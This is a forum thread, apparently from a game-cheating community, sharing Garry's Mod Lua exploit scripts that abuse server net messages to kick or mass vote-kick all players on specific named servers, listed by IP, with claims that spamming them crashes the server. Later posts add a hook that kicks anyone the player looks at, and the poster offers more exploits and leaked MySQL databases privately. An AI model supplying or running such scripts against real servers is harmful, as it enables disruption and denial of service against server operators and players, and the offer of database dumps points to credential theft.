Red faceMore exploits. DeathLegends and more.

Posts 1–11 of 11 · Page 1 of 1
More exploits. DeathLegends and more.
Code:
concommand.Add("exploit_deathkick",function()
for k,v in pairs(player.GetAll()) do
local kickdisbitch2 = LocalPlayer():GetEyeTrace().Entity 
			net.Start("RecKickAFKer")
			net.WriteEntity(kickdisbitch2)
			net.SendToServer()
end
end) 
-- Kicks whoever you looking at.
concommand.Add("exploit_deathkickall",function()
for k,v in pairs(player.GetAll()) do
if v != LocalPlayer() then
			net.Start("RecKickAFKer")
				net.WriteEntity(v)
			net.SendToServer()
end
end -- Kicks everyone
end)
IP 192.228.110.118:27015
Works on this server. Not patched ye.

Code:
concommand.Add("exploit_jbkickall",function()
for k,v in pairs(player.GetAll()) do
						net.Start("JB_Votekick")
						net.WriteEntity(v)
						net.WriteString("Because you been a bad boy and didn't apologize. Maybe next time please apologize :DBecause you been a bad boy and didn't apologize. Maybe next time please apologize :D Because you been a bad boy and didn't apologize. Maybe ")
						net.SendToServer()
end
end)
This didn't copy and paste correctly lol
IP 69.174.242.254:27015
Works on all cube jailbreaks and votekicks everyone on the server spam it and it will crash it or annoy the shit out of everyone.
I have tons of exploits but I ain't putting on here sorry bud. You have to PM me for them. I have like exploits on DL to level yourself to lvl 6969
And really good stuff You have to PM ME for it to avoid nurds. Also giving away some mysqls when I hit 30


Can someone change the request to Release or Source Code? I fucked up
These look cool and all but im new to this so how does one use these?
Thanks for pumping out these exploits man! Does the first one kick everyone? It's not really explained, lol.
First one looks like it just kicks a single person or everybody on the server.
The second is just as OP said, it spams votekick.
The first one is on deathlegends the zombieoutbreak server. It kicks everyone in the server except for you. The exploit_deathkick concommand kicks whoever your looking at. The last one is Cube it just votekicks everybody and annoying people on Cube Jailbreak
Quote Originally Posted by TheLegenderyCat View Post
Code:
concommand.Add("exploit_deathkick",function()
for k,v in pairs(player.GetAll()) do
local kickdisbitch2 = LocalPlayer():GetEyeTrace().Entity 
			net.Start("RecKickAFKer")
			net.WriteEntity(kickdisbitch2)
			net.SendToServer()
end
end) 
-- Kicks whoever you looking at.
concommand.Add("exploit_deathkickall",function()
for k,v in pairs(player.GetAll()) do
if v != LocalPlayer() then
			net.Start("RecKickAFKer")
				net.WriteEntity(v)
			net.SendToServer()
end
end -- Kicks everyone
end)
IP 192.228.110.118:27015
Works on this server. Not patched ye.

Code:
concommand.Add("exploit_jbkickall",function()
for k,v in pairs(player.GetAll()) do
						net.Start("JB_Votekick")
						net.WriteEntity(v)
						net.WriteString("Because you been a bad boy and didn't apologize. Maybe next time please apologize :DBecause you been a bad boy and didn't apologize. Maybe next time please apologize :D Because you been a bad boy and didn't apologize. Maybe ")
						net.SendToServer()
end
end)
This didn't copy and paste correctly lol
IP 69.174.242.254:27015
Works on all cube jailbreaks and votekicks everyone on the server spam it and it will crash it or annoy the shit out of everyone.
I have tons of exploits but I ain't putting on here sorry bud. You have to PM me for them. I have like exploits on DL to level yourself to lvl 6969
And really good stuff You have to PM ME for it to avoid nurds. Also giving away some mysqls when I hit 30


Can someone change the request to Release or Source Code? I fucked up
Here is another one you can use, To annoy people!

Code:
local r = math.random(3481324,9148523)

hook.Add("Think",r, function()
	local kickdisbitch2 = LocalPlayer():GetEyeTrace().Entity 
	if IsValid(kickdisbitch2) then
		net.Start("RecKickAFKer")
		net.WriteEntity(kickdisbitch2)
		net.SendToServer()
	end
end)
Kick anyone you see if you look at them, You need aimbot for quick kick spam or just normal view it!
nice bug report. they commented out the entire afk system. nice
Code:
--[[if NextTick <= time then

		NextTick = time + 1



		local doafk = (self:GetWave() > 0)



		if (MySelf:GetRankLevel() > 4) then

			if doafk then

				local x, y = gui.MousePos()

				if (x ~= (MySelf.LastX or 0)) or (y ~= (MySelf.LastY or 0)) then

					if MySelf.AFK then

						MySelf.AFK = false

						MySelf:ChatPrint("<silkicon icon=clock> Welcome back, "..MySelf:Name().."!")

					end



					MySelf.LastNotAFK = CurTime()

				end



				MySelf.LastX = x

				MySelf.LastY = y



				--local obs = MySelf:GetObserverTarget()

				--local dynamicSpawn = self:DynamicSpawnIsValid(obs and obs:IsValid() and obs:IsPlayer() and obs:Team() == TEAM_UNDEAD and obs or MySelf)



				-- Don't kick people if they're a dynamic spawn

				--if dynamicSpawn then continue end



				if MySelf.LastNotAFK then

					if (time > (MySelf.LastNotAFK + 40)) then

						if (time > (MySelf.LastNotAFK + 340)) then

							net.Start("RecKickAFKer")

								net.WriteEntity(MySelf)

							net.SendToServer()

						else

							if not MySelf.AFK then

								MySelf:ChatPrint("<silkicon icon=clock> You are now AFK.")

								MySelf.AFK = true

							end

						end

					end

				end

			end

		end

	end]]
man sure does make me mad when people are so dumb they write the localplayer in a net message
good job though
/First 1 Is Not Working.
Quote Originally Posted by Trippy. View Post
/First 1 Is Not Working.
Owner patched it
more autism, oh god thoses stupid server owners
Posts 1–11 of 11 · Page 1 of 1

Post a Reply

Similar Threads

Tags for this Thread

Need help?